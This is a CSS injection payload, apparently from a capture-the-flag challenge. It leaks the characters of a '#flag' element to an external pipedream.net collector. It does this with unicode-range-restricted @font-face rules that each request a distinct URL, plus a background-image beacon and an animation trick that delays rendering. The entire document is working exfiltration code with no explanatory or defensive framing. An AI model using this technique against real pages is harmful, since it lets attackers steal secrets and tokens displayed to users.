body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W34')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w34,p98w34,p106w34,p112w34,p115w34,p121w34,p122w34,p48w34,p49w34,p52w34,p53w34,p55w34,p125w34,monospace;width:34ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W34');unicode-range:U+0061}
@font-face{font-family:p98w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W34');unicode-range:U+0062}
@font-face{font-family:p106w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W34');unicode-range:U+006A}
@font-face{font-family:p112w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W34');unicode-range:U+0070}
@font-face{font-family:p115w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W34');unicode-range:U+0073}
@font-face{font-family:p121w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W34');unicode-range:U+0079}
@font-face{font-family:p122w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W34');unicode-range:U+007A}
@font-face{font-family:p48w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W34');unicode-range:U+0030}
@font-face{font-family:p49w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W34');unicode-range:U+0031}
@font-face{font-family:p52w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W34');unicode-range:U+0034}
@font-face{font-family:p53w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W34');unicode-range:U+0035}
@font-face{font-family:p55w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W34');unicode-range:U+0037}
@font-face{font-family:p125w34;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W34');unicode-range:U+007D}